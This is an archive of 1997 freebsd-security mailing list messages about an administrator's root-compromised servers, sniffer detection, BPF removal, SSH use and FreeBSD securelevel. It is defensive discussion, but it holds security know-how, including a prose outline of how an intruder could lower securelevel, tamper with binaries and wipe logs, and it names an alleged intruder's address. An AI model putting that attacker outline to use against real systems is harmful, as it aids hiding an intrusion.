(PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA17380 for ; Mon, 28 Jul 1997 17:36:08 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07344; Mon, 28 Jul 1997 17:34:27 -0700 (PDT) Date: Mon, 28 Jul 1997 17:34:27 -0700 (PDT) From: Vincent Poy To: Brian Buchanan cc: freebsd-security@freebsd.org, JbHunt , "[Mario1-]" Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Brian Buchanan wrote: =)Uh, that would defeat the purpose of securelevel. It's not supposed to be =)possible to ever lower it, except when dropping into single-user mode, and =)even allowing init to do so in that instance is risky IMHO - a few months =)ago I reported a hole, which I believe was fixed, that made it possible to =)lower the securelevel by attaching a debugger to init. Even though that's =)plugged now, it's still possible that there's another way to fool the =)kernel into thinking that process 1 is requesting that securelevel be =)lowered. Anything is possible since nothing is unhackable. Would running init at securelevel 2 and then have it reboot multi-user at a lower level be possible? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 17:36:33 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA17454 for security-outgoing; Mon, 28 Jul 1997 17:36:33 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA17437 for ; Mon, 28 Jul 1997 17:36:29 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA25707; Mon, 28 Jul 1997 20:36:28 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA08210; Mon, 28 Jul 1997 20:36:27 -0400 (EDT) To: Brian Buchanan cc: "Nicole H." , security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-reply-to: Your message of "Mon, 28 Jul 1997 19:06:47 EDT." Date: Mon, 28 Jul 1997 20:36:27 -0400 Message-ID: <8208.870136587@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Brian Buchanan wrote in message ID : > I was wondering the same thing when I read a clause prohibiting the use of > network cards in promiscuous mode in the CMU network use policy. I asked > some computer security people I knew about this and their response was > that it is not possible to detect if a network card is in promiscious mode > unless you have access to the machine it's in - i.e., that you can look at > ifconfig on that machine. That only works if ifconfig has not been altered to hide the flag. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 17:40:37 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA17865 for security-outgoing; Mon, 28 Jul 1997 17:40:37 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA17860; Mon, 28 Jul 1997 17:40:32 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07383; Mon, 28 Jul 1997 17:40:28 -0700 (PDT) Date: Mon, 28 Jul 1997 17:40:28 -0700 (PDT) From: Vincent Poy To: Gary Palmer cc: "Nicole H." , Robert Watson , "[Mario1-]" , JbHunt , security@FreeBSD.ORG, Tomasz Dudziak Subject: Re: security hole in FreeBSD In-Reply-To: <6954.870136449@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Gary Palmer wrote: =)"Nicole H." wrote in message ID =): =) =) =)> Does anyone know of a good way to detect people "sniffing" on the =)> network? IE a program that will detect a machine running in =)> promiscuous mode? =) =)There is no way to detect that from outside the machine ... after all, =)its just listening to all the packets that go past. =) =)FreeBSD 2.2 and later log a message to console when an interface goes =)into promiscuous mode. It seems the interface always goes into promiscuous mode though. =)The *REAL* answer is to remove BPF from all machines, and make sure =)they stay removed. Hmmm, if BPF isn't there, how will utils like trafshow work to track people down? Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 17:45:20 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18243 for security-outgoing; Mon, 28 Jul 1997 17:45:20 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18236 for ; Mon, 28 Jul 1997 17:45:11 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA27505; Mon, 28 Jul 1997 20:44:50 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA09761; Mon, 28 Jul 1997 20:44:45 -0400 (EDT) To: Vincent Poy cc: "Jordan K. Hubbard" , security@FreeBSD.ORG, "[Mario1-]" , JbHunt From: "Gary Palmer" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 16:15:13 PDT." Date: Mon, 28 Jul 1997 20:44:45 -0400 Message-ID: <9758.870137085@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote in message ID : > On Mon, 28 Jul 1997, Jordan K. Hubbard wrote: > > =)I think you are describing the symptom, not the problem. > =) > =)This looks very much like a system which was broken into and then > =)trojan'd to allow easier, more invisible access. How do you know, > =)for example, that your telnetd is really telnetd? Did you verify that? ;) > > Well, because I connect to the system using telnet ;) Also, this > guy has been known to break in to machines > (theca@wil-de7-10.ix.netcom.com). This is the person who also hacked > irc.hardlink.com. I think this person goes around hacking machine after > machine, and nobody does anything about it. If this hack caused loss of service, notify your local (or state) police. They'll do something. > =)Also, I'd check that inetd.conf file again and make _really sure_ you > =)haven't left remote shell access enabled - a lot of people miss that > =)because it's not explicitly labelled "rlogin" like they might expect. > I checked and disabled everything except telnetd in > /etc/inetd.conf and rebooted the machine and then he kicked all of us who > are admins out and shutdown the system. Vince, I hate to say this, but you really need to learn more about administring a system. Do you use SSH for secure access for people who have root access? If not, you are *ASKING* to be hacked every day of the week. If you don't use SSH, do you use one-time passwords (e.g. skey?) How do you know your telnetd binary is what it claims to be? Your machine has been compromised to the *ROOT* level. *EVERY* single binary and file on that machine *COULD HAVE BEEN REPLACED*. Take that machine off the net *NOW* and work on it from console. If that is not an option, then you really need to start learning (fast) about just what a hacker can do to your system. If he really has that level of access, you are *SCREWED* right now without console access. Even if you put sshd on there now, he could have it replaced with his own version before you could make use of it and kick him off. And I must say, if you haven't taken reasonable steps to secure your admin sessions, and following the security and cvs mailing lists for bugs, then you really have been asking for this. I know (from experience) just what it takes to run a shell server, and just what hackers these days can do with 5 minutes of their spare time. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 17:45:54 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18297 for security-outgoing; Mon, 28 Jul 1997 17:45:54 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18292 for ; Mon, 28 Jul 1997 17:45:47 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA27651; Mon, 28 Jul 1997 20:45:40 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA09946; Mon, 28 Jul 1997 20:45:39 -0400 (EDT) To: "Nicole H." cc: Brian Buchanan , security@FreeBSD.ORG From: "Gary Palmer" Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-reply-to: Your message of "Mon, 28 Jul 1997 04:40:47 -0800." Date: Mon, 28 Jul 1997 20:45:39 -0400 Message-ID: <9944.870137139@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk "Nicole H." wrote in message ID : > What is the range of sniffing? I.E. can the "sniffer" sniff past > switched networks? Not without access to the switch to reprogram it (not all switches allow that mode anyhow). Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 17:48:48 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18497 for security-outgoing; Mon, 28 Jul 1997 17:48:48 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18484 for ; Mon, 28 Jul 1997 17:48:39 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id UAA03760; Mon, 28 Jul 1997 20:47:48 GMT Date: Mon, 28 Jul 1997 20:47:48 +0000 (GMT) From: "Jonathan A. Zdziarski" To: Vincent Poy cc: Nate Williams , Robert Watson , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hrm that's weird. I just tried it myself and it kills them all. Maybe you've got a bad compile? How about a kill -9? ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- On Mon, 28 Jul 1997, Vincent Poy wrote: :On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: : :=)Actually if you kill the root httpd the others do die (or are supposed to) : : I tried it before but it doesn't die... Only the master ones die. : : :Cheers, :Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ :Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] :GaiaNet Corporation - M & C Estate / / / / | / | __] ] :Beverly Hills, California USA 90210 / / / / / |/ / | __] ] :HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] : : From owner-freebsd-security Mon Jul 28 17:50:28 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18684 for security-outgoing; Mon, 28 Jul 1997 17:50:28 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18679 for ; Mon, 28 Jul 1997 17:50:26 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07448; Mon, 28 Jul 1997 17:50:06 -0700 (PDT) Date: Mon, 28 Jul 1997 17:50:06 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: Nate Williams , Robert Watson , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)Hrm that's weird. I just tried it myself and it kills them all. Maybe =)you've got a bad compile? How about a kill -9? I always used kill -9 and I don't think it's a bad compile because it's now at 1.3 and happed from the days of 1.1. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 17:52:19 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA18962 for security-outgoing; Mon, 28 Jul 1997 17:52:19 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA18946 for ; Mon, 28 Jul 1997 17:52:14 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id UAA03967; Mon, 28 Jul 1997 20:51:23 GMT Date: Mon, 28 Jul 1997 20:51:22 +0000 (GMT) From: "Jonathan A. Zdziarski" To: Vincent Poy cc: Nate Williams , Robert Watson , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hrm if you always use kill -9 try the reverse, just a kill or a kill -15 ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- On Mon, 28 Jul 1997, Vincent Poy wrote: :On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: : :=)Hrm that's weird. I just tried it myself and it kills them all. Maybe :=)you've got a bad compile? How about a kill -9? : : I always used kill -9 and I don't think it's a bad compile because :it's now at 1.3 and happed from the days of 1.1. : : :Cheers, :Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ :Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] :GaiaNet Corporation - M & C Estate / / / / | / | __] ] :Beverly Hills, California USA 90210 / / / / / |/ / | __] ] :HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] : : From owner-freebsd-security Mon Jul 28 17:54:19 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA19087 for security-outgoing; Mon, 28 Jul 1997 17:54:19 -0700 (PDT) Received: from mail.webspan.net (root@mail.webspan.net [206.154.70.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA19077 for ; Mon, 28 Jul 1997 17:54:15 -0700 (PDT) Received: from orion.webspan.net (orion.webspan.net [206.154.70.5]) by mail.webspan.net (WEBSPAN/970608) with ESMTP id UAA29489; Mon, 28 Jul 1997 20:54:00 -0400 (EDT) Received: from orion.webspan.net (localhost [127.0.0.1]) by orion.webspan.net (WEBSPAN/970608) with ESMTP id UAA12857; Mon, 28 Jul 1997 20:53:59 -0400 (EDT) To: Vincent Poy cc: "Nicole H." , Robert Watson , "[Mario1-]" , JbHunt , security@FreeBSD.ORG, Tomasz Dudziak From: "Gary Palmer" Subject: Re: security hole in FreeBSD In-reply-to: Your message of "Mon, 28 Jul 1997 17:40:28 PDT." Date: Mon, 28 Jul 1997 20:53:59 -0400 Message-ID: <12855.870137639@orion.webspan.net> Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Vincent Poy wrote in message ID : > It seems the interface always goes into promiscuous mode though. Err? Not on my systems it doesn't. > Hmmm, if BPF isn't there, how will utils like trafshow work to > track people down? Track what people down? It's really a choice. You can run a secure shell server or you can run a shell server which, if hacked, becomes a real threat. I've taken certain liberties locally (bpf is still compiled in), but since the machine is right behind me (literally), and carefully watched, I'm not particularly worried right now. Gary -- Gary Palmer FreeBSD Core Team Member FreeBSD: Turning PC's into workstations. See http://www.FreeBSD.ORG/ for info From owner-freebsd-security Mon Jul 28 17:55:40 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA19177 for security-outgoing; Mon, 28 Jul 1997 17:55:40 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA19172 for ; Mon, 28 Jul 1997 17:55:38 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id UAA04153 for ; Mon, 28 Jul 1997 20:55:00 GMT Date: Mon, 28 Jul 1997 20:55:00 +0000 (GMT) From: "Jonathan A. Zdziarski" To: security@freebsd.org Subject: Location of login source Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Hrm I don't have a /usr/src/usr.bin I'm running 2.2.2 - is it elsewhere? Is it available via ftp ? ------------------------------------------------------------------------- Jonathan A. Zdziarski NetRail Incorporated Server Engineering Manager 230 Peachtree St. Suite 500 jonz@netrail.net Atlanta, GA 30303 http://www.netrail.net (888) - NETRAIL ------------------------------------------------------------------------- From owner-freebsd-security Mon Jul 28 17:58:13 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id RAA19424 for security-outgoing; Mon, 28 Jul 1997 17:58:13 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id RAA19419; Mon, 28 Jul 1997 17:58:09 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id RAA07482; Mon, 28 Jul 1997 17:58:05 -0700 (PDT) Date: Mon, 28 Jul 1997 17:58:05 -0700 (PDT) From: Vincent Poy To: Gary Palmer cc: "Jordan K. Hubbard" , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: <9758.870137085@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Gary Palmer wrote: =)Vincent Poy wrote in message ID =): =)> On Mon, 28 Jul 1997, Jordan K. Hubbard wrote: =)> =)> =)I think you are describing the symptom, not the problem. =)> =) =)> =)This looks very much like a system which was broken into and then =)> =)trojan'd to allow easier, more invisible access. How do you know, =)> =)for example, that your telnetd is really telnetd? Did you verify that? ;) =)> =)> Well, because I connect to the system using telnet ;) Also, this =)> guy has been known to break in to machines =)> (theca@wil-de7-10.ix.netcom.com). This is the person who also hacked =)> irc.hardlink.com. I think this person goes around hacking machine after =)> machine, and nobody does anything about it. =) =)If this hack caused loss of service, notify your local (or state) =)police. They'll do something. It's out of state and notifying the FBI would take some time and they would do more damage to the system. =)> =)Also, I'd check that inetd.conf file again and make _really sure_ you =)> =)haven't left remote shell access enabled - a lot of people miss that =)> =)because it's not explicitly labelled "rlogin" like they might expect. =) =)> I checked and disabled everything except telnetd in =)> /etc/inetd.conf and rebooted the machine and then he kicked all of us who =)> are admins out and shutdown the system. =) =)Vince, I hate to say this, but you really need to learn more about =)administring a system. Do you use SSH for secure access for people who =)have root access? If not, you are *ASKING* to be hacked every day of =)the week. If you don't use SSH, do you use one-time passwords =)(e.g. skey?) How do you know your telnetd binary is what it claims to =)be? Your machine has been compromised to the *ROOT* level. *EVERY* =)single binary and file on that machine *COULD HAVE BEEN REPLACED*. We're not using ssh but was planing to do so until this happened. I telneted in to make sure that it was really telnet and checked the file size/dates and other info with another machine to verify it. We're not using one time passwords either. The break in according to the hacker was done because of a security hole in perl5.00401 and the default .rhosts file that came with the root account so they were able to login to the other machine to do damage. The hacker was not interested in mercury.GAIANET.NET even though that was where he did the hack from using perl. After the hack was done, he just rlogin to earth which is where he had no shell access before. =)Take that machine off the net *NOW* and work on it from console. If =)that is not an option, then you really need to start learning (fast) =)about just what a hacker can do to your system. If he really has that =)level of access, you are *SCREWED* right now without console =)access. Even if you put sshd on there now, he could have it replaced =)with his own version before you could make use of it and kick him off. All the machines are already unreacheable and off the net. All of the admins including me run the machine remotely since the owners are the only ones who are local and they are out of the country for the next 4 months so there isn't any way to do it on the console. =)And I must say, if you haven't taken reasonable steps to secure your =)admin sessions, and following the security and cvs mailing lists for =)bugs, then you really have been asking for this. I know (from =)experience) just what it takes to run a shell server, and just what =)hackers these days can do with 5 minutes of their spare time. I did follow the security and cvs mailing list for bugs, that's why I make the necessary changes to the systems every time a new security exploit is reported just to be on the safe side. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 18:01:42 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA19816 for security-outgoing; Mon, 28 Jul 1997 18:01:42 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA19809; Mon, 28 Jul 1997 18:01:37 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id SAA07502; Mon, 28 Jul 1997 18:01:25 -0700 (PDT) Date: Mon, 28 Jul 1997 18:01:25 -0700 (PDT) From: Vincent Poy To: Gary Palmer cc: "Nicole H." , Robert Watson , "[Mario1-]" , JbHunt , security@FreeBSD.ORG, Tomasz Dudziak Subject: Re: security hole in FreeBSD In-Reply-To: <12855.870137639@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Gary Palmer wrote: =)Vincent Poy wrote in message ID =): =)> It seems the interface always goes into promiscuous mode though. =) =)Err? Not on my systems it doesn't. It seems to happen on every machine including fresh installed ones. This is from dmesg: ed1: promiscuous mode enabled ed1: promiscuous mode enabled ed1: promiscuous mode enabled =)> Hmmm, if BPF isn't there, how will utils like trafshow work to =)> track people down? =) =)Track what people down? Track people who ping icmp flood the machine since that's what trafshow is for. =)It's really a choice. You can run a secure shell server or you can run =)a shell server which, if hacked, becomes a real threat. I've taken =)certain liberties locally (bpf is still compiled in), but since the =)machine is right behind me (literally), and carefully watched, I'm not =)particularly worried right now. I watch the machines like 20 hours a day almost and no one even knows I'm logged on when I'm using screen sessions. and I never su unless necessary. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 18:02:43 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA19896 for security-outgoing; Mon, 28 Jul 1997 18:02:43 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA19890 for ; Mon, 28 Jul 1997 18:02:39 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id SAA07515; Mon, 28 Jul 1997 18:02:17 -0700 (PDT) Date: Mon, 28 Jul 1997 18:02:17 -0700 (PDT) From: Vincent Poy To: "Jonathan A. Zdziarski" cc: Nate Williams , Robert Watson , Tomasz Dudziak , security@freebsd.org, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote: =)Hrm if you always use kill -9 try the reverse, just a kill or a kill -15 I did that too. even kill -HUP only kills the master process. I had to kill the child process manually. Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 18:20:24 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA20967 for security-outgoing; Mon, 28 Jul 1997 18:20:24 -0700 (PDT) Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA20958; Mon, 28 Jul 1997 18:20:17 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id VAA27284; Mon, 28 Jul 1997 21:20:06 -0400 (EDT) Date: Mon, 28 Jul 1997 21:20:05 -0400 (EDT) From: Brian Buchanan To: Gary Palmer cc: security@FreeBSD.ORG Subject: Re: Detecting sniffers (was: Re: security hole in FreeBSD) In-Reply-To: <8208.870136587@orion.webspan.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Gary Palmer wrote: > Brian Buchanan wrote in message ID > : > > I was wondering the same thing when I read a clause prohibiting the use of > > network cards in promiscuous mode in the CMU network use policy. I asked > > some computer security people I knew about this and their response was > > that it is not possible to detect if a network card is in promiscious mode > > unless you have access to the machine it's in - i.e., that you can look at > > ifconfig on that machine. > > That only works if ifconfig has not been altered to hide the flag. That wasn't my point. My point was that it's not possible to detect it without access to the local box. If you had root access you could always query the card itself to see if it was set promiscious. From owner-freebsd-security Mon Jul 28 18:25:52 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA21258 for security-outgoing; Mon, 28 Jul 1997 18:25:52 -0700 (PDT) Received: from thought.res.cmu.edu (THOUGHT.RES.CMU.EDU [128.2.94.7]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA21253 for ; Mon, 28 Jul 1997 18:25:46 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by thought.res.cmu.edu (8.8.5/8.6.12) with SMTP id VAA27288; Mon, 28 Jul 1997 21:24:56 -0400 (EDT) Date: Mon, 28 Jul 1997 21:24:56 -0400 (EDT) From: Brian Buchanan To: Vincent Poy cc: freebsd-security@freebsd.org Subject: Re: securelevel (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 28 Jul 1997, Vincent Poy wrote: > On Mon, 28 Jul 1997, Brian Buchanan wrote: > > =)Uh, that would defeat the purpose of securelevel. It's not supposed to be > =)possible to ever lower it, except when dropping into single-user mode, and > =)even allowing init to do so in that instance is risky IMHO - a few months > =)ago I reported a hole, which I believe was fixed, that made it possible to > =)lower the securelevel by attaching a debugger to init. Even though that's > =)plugged now, it's still possible that there's another way to fool the > =)kernel into thinking that process 1 is requesting that securelevel be > =)lowered. > > Anything is possible since nothing is unhackable. Would running > init at securelevel 2 and then have it reboot multi-user at a lower level > be possible? That defeats it just the same. The attacker breaks in, reboots the system into multi-user with securelevel 0, removes schg flags, alters init, the kernel, /bin/login, whatever, kills the logs, raises securelevel back to 2 to cover his tracks. Allowing the securelevel to be lowered and the system to return to multi-user mode without operator confirmation is a bad thing - it completely defeats its purpose. If it's not possible to do maintenance at the local console, it's probably best not to use securelevel. From owner-freebsd-security Mon Jul 28 18:41:44 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id SAA22427 for security-outgoing; Mon, 28 Jul 1997 18:41:44 -0700 (PDT) Received: from sasami.jurai.net (winter@sasami.jurai.net [207.96.1.17]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id SAA22419 for ; Mon, 28 Jul 1997 18:41:42 -0700 (PDT) Received: from localhost (winter@localhost) by sasami.jurai.net (8.8.5/8.8.5) with SMTP id VAA29988; Mon, 28 Jul 1997 21:41:39 -0400 (EDT) Date: Mon, 28 Jul 1997 21:41:38 -0400 (EDT) From: "Matthew N. Dodd" To: Vincent Poy cc: security@FreeBSD.ORG 